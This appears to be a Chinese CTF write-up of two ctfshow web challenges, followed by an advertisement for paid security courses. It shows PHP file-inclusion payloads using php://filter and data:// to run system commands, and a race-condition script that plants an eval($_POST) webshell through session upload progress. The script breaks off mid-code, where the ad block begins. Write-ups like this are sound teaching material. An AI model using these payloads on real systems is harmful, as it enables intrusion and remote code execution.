ctfshow-36D练手赛

?file=test.
test.php
flag_not_here


 猜测文件包含,


传入:



?file=php://filter/convert.base64-encode/resource=test/…/index.


解码的得: 



<?php error_reporting(0); $file=$_GET['file']; $file=$file.'php'; echo $file."
"; if(preg_match('/test/is',$file)){ include ($file); }else{ echo '$file must has test'; } ?>

playload:



利用data://协议,进行getshell。可以执行php命令。

/?file=data://text/plain,<?php system('ls /');?>test

/?file=data://text/plain,<?php system('cat /FFFFFFFL@GGGG');?>test


## easyshell


通过burp抓包



先随便传入,获取cookie,将获取的cookie放入pass,name不变

?name=2222&pass=0382dd97e8e5ccf50135efe75e822034


![](https://img-blog.csdnimg.cn/direct/d36978424d7e43859753e342bd349fa6.png)


 发现flflflflag.php,得到



可以通过php伪协议进行文件读取

通过目录扫描可以知道存在dir.php和config.php

include($_GET[“file”])



…dir.php
/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=dir.php

<?php var_dump(scandir('/tmp')); ?>

…config.php
config.php
/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=config.php

<?php $secret='%^$&$#fffd'; ?>

…index.php
/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=index.php

<?php include 'config.php'; @$name=$_GET['name']; @$pass=$_GET['pass']; if(md5($secret.$name)===$pass){ echo ' '; }else{ setcookie("Hash",md5($secret.$name),time()+3600000); echo "username/password error"; } ?> ```

没有利用的漏斗页面,所以利用session文件包含(条件竞争)获取getshell。

'''
cookie为PHPSESSID=123,那么就会生成一个sess_123的session文件,此时php会自动初始化session,并产生一个键值,
格式为配置文件中的session.upload_progress.prefix的值+我们上传的session.upload_progress.name的值此键值会写入session文件。
该键值的格式应该为:upload_progress_+PHP_SESSION_UPLOAD_PROGRESS的值。

session.upload_progress.cleanup = on:表示当文件上传结束后,php将会立即清空对应session文件中的内容。该选项默认开启,需要条件竞争

session.use_strict_mode:默认情况下,该选项的值是0,此时用户可以自己定义Session ID。

session.auto_start:如果开启这个选项,则PHP在接收请求的时候会自动初始化Session,不再需要执行
session_start()。但默认情况下,也是通常情况下,这个选项都是默认关闭的。
'''

脚本如下:

import requests
import threading

url = 'https://bbbd23d4-0fc9-43f0-9da1-459d63e257bf.challenge.ctf.show/flflflflag.php'
sessid = 'getshell'

def POST(session):
    while True:
        session.post(
            url,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php file_put_contents('shell.php','<?php eval($_POST[1]);?>');?>"},
            files={"file":'shell.php'},
            cookies={'PHPSESSID':sessid}
## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/cfad65faa63c9401de1b00e4790988d2.png)

![img](https://img-blog.csdnimg.cn/img_convert/a80e4b289024088499ba151a70fd14c2.png)

![img](https://img-blog.csdnimg.cn/img_convert/cb9abc86840811f67e66fbe905e3a447.png)

![img](https://img-blog.csdnimg.cn/img_convert/6dc1f07c932689fbf300416faa1bcc81.png)

![img](https://img-blog.csdnimg.cn/img_convert/023a78e12b1499a692c8ee39a54d15d3.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值